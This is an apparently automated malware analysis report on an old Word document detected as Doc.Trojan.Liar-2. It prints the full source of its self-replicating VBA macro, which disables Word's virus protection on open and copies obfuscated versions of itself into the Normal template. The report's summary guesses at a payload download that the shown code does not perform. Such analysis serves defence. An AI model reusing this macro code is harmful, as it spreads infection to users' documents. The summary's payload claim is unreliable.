Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b40aec67ff35c9e1…

MALICIOUS

Office (OLE)

Size: 28.5 KB
Created: 1999-08-06 20:13:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c9de83e4b7c9f8ad8b9c2f00da53322a
SHA-1: 05cae2ef93218d4c8c18cf4f4b1b1323fcd3459d
SHA-256: b40aec67ff35c9e138fc7ea347ebad216fe57369fa8af25d7c15be0ff50e62ea
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be obfuscated and attempts to modify the document's code, likely to download and execute a secondary payload. The ClamAV detection name 'Doc.Trojan.Liar-2' further supports its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Trojan.Liar-2 (severity: critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Liar-2
  • VBA macros detected (severity: medium; 1 related finding; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; OLE_VBA_DOCOPEN)
    The document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7379 bytes
SHA-256: 28037a4ab6c230e3ef013a84b24a0b4a86602cc17fdd6e95b6da8a25ab333867
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Do you see what I see? Do you hear what I hear?'
Rem Do you feel what I feel?'
Rem Do you ever cared?'
Rem                           -jackie twoflower-'
Private Sub Document_Open() '
On Error Resume Next '
Dim Bm630(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '
Set Cf546 = MacroContainer.VBProject: Set Ll729 = Cf546.VBComponents(1) '
Set De594 = Ll729.CodeModule: Set Jh11 = NormalTemplate: Li495 = Chr(39) '
If MacroContainer = Jh11 Then Set Jh11 = ActiveDocument '
Set Vu944 = Jh11.VBProject.VBComponents(1).CodeModule: Eo654 = De594.CountOfLines: Tt963 = 100 + Int(Rnd * 50) '
For No220 = 1 To Eo654: Su942 = "": Di568 = Int(Rnd * 4): Qp530 = InStr(De594.Lines(No220, 1), Li495) '
If Qp530 = 1 And Eo654 > Tt963 Then '
Di568 = 1: GoTo Eq83 '
End If '
Dg903 = UCase(Left(De594.Lines(No220, 1), (Qp530 - 1))) '
For Uv117 = 1 To Len(Dg903): Gx417 = Mid(Dg903, Uv117, 1) '
If Asc(Gx417) < 90 And Asc(Gx417) > 65 Then Gx417 = Chr(Asc(Gx417) + Int(Rnd * 2) * 32) '
Bm630(No220) = Bm630(No220) & Gx417: Next Uv117 '
For Gr444 = 1 To Int(75 - Int(Rnd * 20)): Su942 = Su942 & Chr(255 - Int(Rnd * 100)): Next Gr444 '
Bm630(No220) = Bm630(No220) & Li495 & Su942 '
If Di568 = 2 Then Bm630(No220) = Bm630(No220) & vbCr & Li495 & Su942 '
Ut894 = Ut894 & Bm630(No220) & vbCr '
Eq83: '
Next No220 '
If Vu944.CountOfLines < (0 + 2) Then '
Vu944.DeleteLines 1, Vu944.CountOfLines: Vu944.AddFromString Ut894 '
If Jh11 = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName '
End If '
End Sub '
Rem Another macro bug by jackie twoflower's Class Macro Kit v1.0'

' Processing file: /opt/analyzer/scan_staging/94cd2933052b49ffa2f677db364b26dc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3680 bytes
' Line #0:
' 	Rem 0x0031 " Do you see what I see? Do you hear what I hear?'"
' Line #1:
' 	Rem 0x001A " Do you feel what I feel?'"
' Line #2:
' 	Rem 0x0014 " Do you ever cared?'"
' Line #3:
' 	Rem 0x002E "                           -jackie twoflower-'"
' Line #4:
' 	FuncDefn (Private Sub Document_Open())
' 	QuoteRem 0x001B 0x0000 ""
' Line #5:
' 	OnError (Resume Next) 
' 	QuoteRem 0x0014 0x0000 ""
' Line #6:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x00AF 
' 	VarDefn Bm630
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' 	QuoteRem 0x0058 0x0000 ""
' Line #7:
' 	SetStmt 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	Set Cf546 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Cf546 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set Ll729 
' 	QuoteRem 0x0047 0x0000 ""
' Line #8:
' 	SetStmt 
' 	Ld Ll729 
' 	MemLd CodeModule 
' 	Set De594 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set Jh11 
' 	BoS 0x0000 
' 	LitDI2 0x0027 
' 	ArgsLd Chr 0x0001 
' 	St Li495 
' 	QuoteRem 0x0048 0x0000 ""
' Line #9:
' 	Ld MacroContainer 
' 	Ld Jh11 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set Jh11 
' 	EndIf 
' 	QuoteRem 0x0037 0x0000 ""
' Line #10:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Jh11 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Vu944 
' 	BoS 0x0000 
' 	Ld De594 
' 	MemLd CountOfLines 
' 	St Eo654 
' 	BoS 0x0000 
' 	LitDI2 0x0064 
' 	Ld Rnd 
' 	LitDI2 0x0032 
' 	Mul 
' 	FnInt 
' 	Add 
' 	St Tt963 
' 	QuoteRem 0x006E 0x0000 ""
' Line #11:
' 	StartForVariable 
' 	Ld No220 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Eo654 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St Su942 
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0004 
' 	Mul 
' 	FnInt 
' 	St Di568 
' 	BoS 0x0000 
' 	Ld No220 
' 	LitDI2 0x0001 
' 	Ld De594 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Li495 
' 	FnInStr 
' 	St Qp53
... (truncated)